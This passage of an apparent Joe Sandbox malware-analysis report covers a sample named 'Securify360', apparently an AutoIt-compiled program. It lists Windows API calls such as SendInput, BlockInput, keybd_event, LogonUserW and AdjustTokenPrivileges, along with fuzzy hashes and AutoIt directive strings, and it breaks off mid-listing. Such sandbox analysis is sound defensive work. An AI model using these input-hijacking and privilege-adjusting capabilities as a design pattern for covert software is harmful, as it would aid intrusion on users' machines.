                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                              • String ID:
                                                                                              • API String ID: 3429775523-0
                                                                                              • Opcode ID: 4e5310a8e7b714b21e02fc447bbc80980ff836d7b8275f818390669b8293a822
                                                                                              • Instruction ID: a7b7710a6a645cea92b9c262116091f32d8247eaf3969c356b24760144e7cbd8
                                                                                              • Opcode Fuzzy Hash: 4e5310a8e7b714b21e02fc447bbc80980ff836d7b8275f818390669b8293a822
                                                                                              • Instruction Fuzzy Hash: 95F03C7591130CBFEB10DEE09889AAEBBBCEF08211F504469F501E2584D6396A048B50
                                                                                              APIs
                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00FF1B01
                                                                                              • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 00FF1B14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: InputSendkeybd_event
                                                                                              • String ID:
                                                                                              • API String ID: 3536248340-0
                                                                                              • Opcode ID: f2825547eee90200d7438ac30c1c19a742b141e3e00c2519c27cda01163ceb83
                                                                                              • Instruction ID: 502b640c5e6d43327716edc0fe041f47032ca6bc7895c166e61f57ef691f031f
                                                                                              • Opcode Fuzzy Hash: f2825547eee90200d7438ac30c1c19a742b141e3e00c2519c27cda01163ceb83
                                                                                              • Instruction Fuzzy Hash: 3CF0497190020DEBDB10CF94C805BFE7BB4FF04315F10804AFA55A6292D37A9615DF94
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,01009B52,?,0102098C,?), ref: 00FFA6DA
                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,01009B52,?,0102098C,?), ref: 00FFA6EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 32f917bc7fc5cfc4323f76990b32b39e6622da2d6dce4ed360891cbb9967db8a
                                                                                              • Instruction ID: 2d661888665328f32a88558b722e8c67d619b6a647160b682c95fedbae4aeb00
                                                                                              • Opcode Fuzzy Hash: 32f917bc7fc5cfc4323f76990b32b39e6622da2d6dce4ed360891cbb9967db8a
                                                                                              • Instruction Fuzzy Hash: FEF0823550422EBBDB30AFA4CC89FEA776CBF09361F008156F908D6195D6349944DBE1
                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FE8F27), ref: 00FE8DFE
                                                                                              • CloseHandle.KERNEL32(?,?,00FE8F27), ref: 00FE8E10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 81990902-0
                                                                                              • Opcode ID: ef25af246f1018992cc604b01dc173a71525624ff41b3145be279a7d2c27fec6
                                                                                              • Instruction ID: c54e2ea9ae1a7a0e8578bd85b9b4de835e1332a3be31c1308c5de3fb5c12baf8
                                                                                              • Opcode Fuzzy Hash: ef25af246f1018992cc604b01dc173a71525624ff41b3145be279a7d2c27fec6
                                                                                              • Instruction Fuzzy Hash: 1CE0B676010650EFE7362B61EC59DB77BADEB04360B248929F49A80474DB66AC90EB50
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,00FB8F87,0000FCD7,?,?,00000001), ref: 00FBA38A
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FBA393
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 8d7080d272a75c638349192b4c9a695462bf2ca76df78328eed2c4bb60305ae5
                                                                                              • Instruction ID: 6604ef4c6e912ce17774ea5ffeeb0dbeb994dc6339b039afe78cfa8170370d70
                                                                                              • Opcode Fuzzy Hash: 8d7080d272a75c638349192b4c9a695462bf2ca76df78328eed2c4bb60305ae5
                                                                                              • Instruction Fuzzy Hash: 9DB0923106430CEBCA602F91E809B8A3F6CEB44A62F108010F64D44458CBA754508B91
                                                                                              APIs
                                                                                              • BlockInput.USER32(00000001), ref: 010045F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlockInput
                                                                                              • String ID:
                                                                                              • API String ID: 3456056419-0
                                                                                              • Opcode ID: 1608fdfee9cf6c13b9030811aeaf9ca9da7639d17b4dc86695cd3d8af51ea5cc
                                                                                              • Instruction ID: a373af0b2353fc56423c200eccde700cc9f1e35dbaa82bf4f2f6712304b3d465
                                                                                              • Opcode Fuzzy Hash: 1608fdfee9cf6c13b9030811aeaf9ca9da7639d17b4dc86695cd3d8af51ea5cc
                                                                                              • Instruction Fuzzy Hash: F7E0D8352002055FE711EF59D804E4AF7D8AF54760F008016FD45C7352DA75F9018B90
                                                                                              APIs
                                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00FF5205
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: mouse_event
                                                                                              • String ID:
                                                                                              • API String ID: 2434400541-0
                                                                                              • Opcode ID: 41e747b5eec9e6c3d4deeca6aec1a2f974913fca9e263d3209ed9852f60303ae
                                                                                              • Instruction ID: da080e5b3335fbecbd065bb7549390529b7e122c86a24ff643680c4f2039c5d5
                                                                                              • Opcode Fuzzy Hash: 41e747b5eec9e6c3d4deeca6aec1a2f974913fca9e263d3209ed9852f60303ae
                                                                                              • Instruction Fuzzy Hash: 22D05EA5560F0D78EC2807248E0FF361288EB01FD0F9441497342890E2ECD8F845B071
                                                                                              APIs
                                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FE8FA7), ref: 00FE9389
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: LogonUser
                                                                                              • String ID:
                                                                                              • API String ID: 1244722697-0
                                                                                              • Opcode ID: 22e21c8dd162287f29c665d9346c489a4737630bd3132471595d2656656e817e
                                                                                              • Instruction ID: af687b33483e826c366842cdd77900c79c8aabd6d1acb59acdfdad37f3c27698
                                                                                              • Opcode Fuzzy Hash: 22e21c8dd162287f29c665d9346c489a4737630bd3132471595d2656656e817e
                                                                                              • Instruction Fuzzy Hash: 59D05E3226060EABEF118EA4DC01EAE3B69EB04B01F808111FE15D5090C77AD835AF60
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00FD0734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: 5b64ea40db4749272f16f67e66a1561388d15c00797c5f2c812405745fcd3b4d
                                                                                              • Instruction ID: dcf73273c134b7728c5a5bf697d538a0aa0086835b1628d4731eecc9c5dcf90e
                                                                                              • Opcode Fuzzy Hash: 5b64ea40db4749272f16f67e66a1561388d15c00797c5f2c812405745fcd3b4d
                                                                                              • Instruction Fuzzy Hash: 3CC04CF2800109DBDB15DFA0D588EEEB7BCAB04304F240056F145B2104D7789B449B71
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FBA35A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 35da2847e90ae977389da1561e18ac87499262f687ead200df715c3719886171
                                                                                              • Instruction ID: 8c5eeedb16316352a819e28a236d3f4e1353672088044d17b2b64802ca853061
                                                                                              • Opcode Fuzzy Hash: 35da2847e90ae977389da1561e18ac87499262f687ead200df715c3719886171
                                                                                              • Instruction Fuzzy Hash: 40A0223002030CFBCF202F82FC0888ABFACEB002A0B00C020F80C0002ACBB3A8208BC0
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,01020980), ref: 01013C65
                                                                                              • IsWindowVisible.USER32(?), ref: 01013C89
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                              • API String ID: 4105515805-45149045
                                                                                              • Opcode ID: 288d090e66f82d5d9ffa0d3933f5f1f281e099a8d1aa0705f6ecc412925e9da8
                                                                                              • Instruction ID: 89977584efbcb14b87e301525744b3e928c224befe64eac588d2b942a814a8ab
                                                                                              • Opcode Fuzzy Hash: 288d090e66f82d5d9ffa0d3933f5f1f281e099a8d1aa0705f6ecc412925e9da8
                                                                                              • Instruction Fuzzy Hash: D6D1CE702043058BDB14EF15C981AAEBBE1BF94354F148468F9C65B2E6CF39ED0ADB81
                                                                                              APIs
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0101AC55
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0101AC86
                                                                                              • GetSysColor.USER32(0000000F), ref: 0101AC92
                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0101ACAC
                                                                                              • SelectObject.GDI32(?,?), ref: 0101ACBB
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0101ACE6
                                                                                              • GetSysColor.USER32(00000010), ref: 0101ACEE
                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0101ACF5
                                                                                              • FrameRect.USER32(?,?,00000000), ref: 0101AD04
                                                                                              • DeleteObject.GDI32(00000000), ref: 0101AD0B
                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0101AD56
                                                                                              • FillRect.USER32(?,?,?), ref: 0101AD88
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0101ADB3
                                                                                                • Part of subcall function 0101AF18: GetSysColor.USER32(00000012), ref: 0101AF51
                                                                                                • Part of subcall function 0101AF18: SetTextColor.GDI32(?,?), ref: 0101AF55
                                                                                                • Part of subcall function 0101AF18: GetSysColorBrush.USER32(0000000F), ref: 0101AF6B
                                                                                                • Part of subcall function 0101AF18: GetSysColor.USER32(0000000F), ref: 0101AF76
                                                                                                • Part of subcall function 0101AF18: GetSysColor.USER32(00000011), ref: 0101AF93
                                                                                                • Part of subcall function 0101AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101AFA1
                                                                                                • Part of subcall function 0101AF18: SelectObject.GDI32(?,00000000), ref: 0101AFB2
                                                                                                • Part of subcall function 0101AF18: SetBkColor.GDI32(?,00000000), ref: 0101AFBB
                                                                                                • Part of subcall function 0101AF18: SelectObject.GDI32(?,?), ref: 0101AFC8
                                                                                                • Part of subcall function 0101AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0101AFE7
                                                                                                • Part of subcall function 0101AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101AFFE
                                                                                                • Part of subcall function 0101AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0101B013
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                              • String ID:
                                                                                              • API String ID: 4124339563-0
                                                                                              • Opcode ID: 30cb970d53cde304a26de908ea930bc2ecc659ef3fb6bb4df16c19ef57666f84
                                                                                              • Instruction ID: 22e6daf97caf4996d3e69100cc2f899d467845d70f944b83b9d88ab3690bc919
                                                                                              • Opcode Fuzzy Hash: 30cb970d53cde304a26de908ea930bc2ecc659ef3fb6bb4df16c19ef57666f84
                                                                                              • Instruction Fuzzy Hash: 25A1AD72109351EFD7619F64DC08A6B7BE9FF88321F200A19F9A2971D9C73AD844CB51
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?), ref: 00F93072
                                                                                              • DeleteObject.GDI32(00000000), ref: 00F930B8
                                                                                              • DeleteObject.GDI32(00000000), ref: 00F930C3
                                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00F930CE
                                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00F930D9
                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FCC77C
                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FCC7B5
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FCCBDE
                                                                                                • Part of subcall function 00F91F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F92412,?,00000000,?,?,?,?,00F91AA7,00000000,?), ref: 00F91F76
                                                                                              • SendMessageW.USER32(?,00001053), ref: 00FCCC1B
                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FCCC32
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FCCC48
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FCCC53
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                              • String ID: 0
                                                                                              • API String ID: 464785882-4108050209
                                                                                              • Opcode ID: d231907360ca27e4ff81a4bb41e0fbb265f5d51aaa2b1b86cce3476a50db35ba
                                                                                              • Instruction ID: 7aa5057935ea11ca0885dcfc30703f318b34b62396bef02f47ad5de7eb8ee10b
                                                                                              • Opcode Fuzzy Hash: d231907360ca27e4ff81a4bb41e0fbb265f5d51aaa2b1b86cce3476a50db35ba
                                                                                              • Instruction Fuzzy Hash: 6912A030A00202EFDB24DF24C99AFA6BBA1BF44314F14456DF58ACB662C735EC55EB91
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 2660009612-1645009161
                                                                                              • Opcode ID: fc8190cb6a2539487824e673dae27a86e525662f3e8cb21550a90fed46211d7b
                                                                                              • Instruction ID: 9f39e1d226b15f37135c35e1ab57f2c1b78be20bdd12c334bcdfa34b83c959c4
                                                                                              • Opcode Fuzzy Hash: fc8190cb6a2539487824e673dae27a86e525662f3e8cb21550a90fed46211d7b
                                                                                              • Instruction Fuzzy Hash: DEA1C271B40209ABCB24AF66CC82EBE3775BF56750F14002AF845AB252DB789E15FB50
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 01007BC8
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 01007C87
                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 01007CC5
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 01007CD7
                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01007D1D
                                                                                              • GetClientRect.USER32(00000000,?), ref: 01007D29
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01007D6D
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01007D7C
                                                                                              • GetStockObject.GDI32(00000011), ref: 01007D8C
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 01007D90
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 01007DA0
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01007DA9
                                                                                              • DeleteDC.GDI32(00000000), ref: 01007DB2
                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01007DDE
                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 01007DF5
                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01007E30
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01007E44
                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 01007E55
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 01007E85
                                                                                              • GetStockObject.GDI32(00000011), ref: 01007E90
                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01007E9B
                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 01007EA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                              • API String ID: 2910397461-517079104
                                                                                              • Opcode ID: be8c4bdb92403cb58081282790d107809f6017fc8f547553701551941c6bd675
                                                                                              • Instruction ID: 538a03e2f429cb5c2a7965a0228c2d43c1943f462de741d4f2a7e4e9b4f6b208
                                                                                              • Opcode Fuzzy Hash: be8c4bdb92403cb58081282790d107809f6017fc8f547553701551941c6bd675
                                                                                              • Instruction Fuzzy Hash: 57A17FB1A00219BFEB24DFA4DC4AFAFBBA9EB04710F144114FA55A72D4C779AD40DB60
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00FFB361
                                                                                              • GetDriveTypeW.KERNEL32(?,01022C4C,?,\\.\,01020980), ref: 00FFB43E
